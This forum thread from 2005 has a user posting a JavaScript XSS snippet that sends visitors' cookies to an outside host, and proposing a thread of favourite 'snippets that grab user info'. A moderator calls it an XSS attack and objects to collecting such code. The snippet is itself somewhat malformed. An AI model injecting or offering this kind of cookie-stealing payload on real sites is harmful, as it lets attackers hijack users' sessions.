Page 1 of 1

how 'bout a thread about snippets that grab user info

Posted: Tue Sep 20, 2005 8:04 am
by $var
This is one that i found in a htmlentities thread, and i like it.
It steals cookies... a la cookie monster.

Code: Select all

<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>

Posted: Tue Sep 20, 2005 8:14 am
by feyd
that's an XSS attack, that should be directed to the Security board.

Posted: Tue Sep 20, 2005 8:47 am
by $var
yah... i know it is... and it's on the security board...
i was going to post this thread in the security board,
but i thought that maybe we could make a thread of our favourite little pieces,
regardless of what they do.

I just thought that the snippets was more of a place to put pieces of code...
should we move the thread?

Posted: Tue Sep 20, 2005 8:51 am
by feyd
Favourite pieces? Most of us aren't in the habit of using XSS, we just understand where the holes are most often...

Posted: Tue Sep 20, 2005 8:57 am
by $var
i'm but wee in the land of code...
i know that anything that I can contribute is peanuts comparatively...
i'll just stick to asking questions for now.